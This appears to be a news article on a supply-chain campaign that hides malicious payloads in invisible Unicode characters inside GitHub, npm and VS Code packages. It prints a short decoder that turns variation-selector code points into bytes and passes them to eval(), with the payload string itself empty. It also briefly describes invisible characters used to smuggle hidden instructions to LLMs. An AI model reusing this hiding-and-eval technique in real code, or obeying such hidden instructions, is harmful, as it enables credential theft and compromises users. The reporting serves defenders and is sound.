Invisible code is presented with public use areas (sometimes called public use access), which are categories in the Unicode specification for special characters reserved for private use in defining emoji, flags, and other symbols. The code points represent each letter of the American alphabet when entered into a computer, but their output is completely invisible to humans. People reviewing code or using static analysis tools see only spaces or blank lines. To a JavaScript interpreter, code points are translated into executable code.
Invisible Unicode characters were created decades ago and then largely forgotten. That is, until 2024, when hackers started using characters to hide malicious signals fed to AI engines. While the text was invisible to humans and text scanners, the LLM had little trouble reading them and following the malicious instructions they provided. AI engines have since created guardrails designed to restrict the use of characters, but such protections are periodically overridden.
Since then, Unicode technology has been used in more traditional malware attacks. In one of the packages analyzed by Aikido in Friday’s post, the attackers encoded a malicious payload using invisible characters. Inspection of the code doesn’t show anything. However, during JavaScript runtime, a small decoder extracts the actual bytes and passes them to the eval() function.
const s = v => [...v].map(w => (
w = w.codePointAt(0),
w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 : null
)).filter(n => n !== null);
eval(Buffer.from(s(``)).toString('utf-8'));“The backtick string passed to s() appears empty in every viewer, but it is filled with invisible characters that, once decoded, generate a complete malicious payload,” Aikido explained. “In previous incidents, decoded payloads obtained and executed a second-stage script using Solana as the delivery channel, which was capable of stealing tokens, credentials, and secrets.”
Since finding the new round of packages on GitHub, researchers have found similar packages on npm and the VS Code marketplace. Aikido said the 151 packages found are likely a small fraction of those spread across the entire campaign as many have been removed since they were first uploaded.
The best way to protect against the scourge of supply-chain attacks is to carefully inspect packages and their dependencies before including them in projects. This includes checking package names and looking for typos. If suspicions about the use of LLM are correct, malicious packages may increasingly appear legitimate, especially when invisible Unicode characters are encoding the malicious payload.
<a href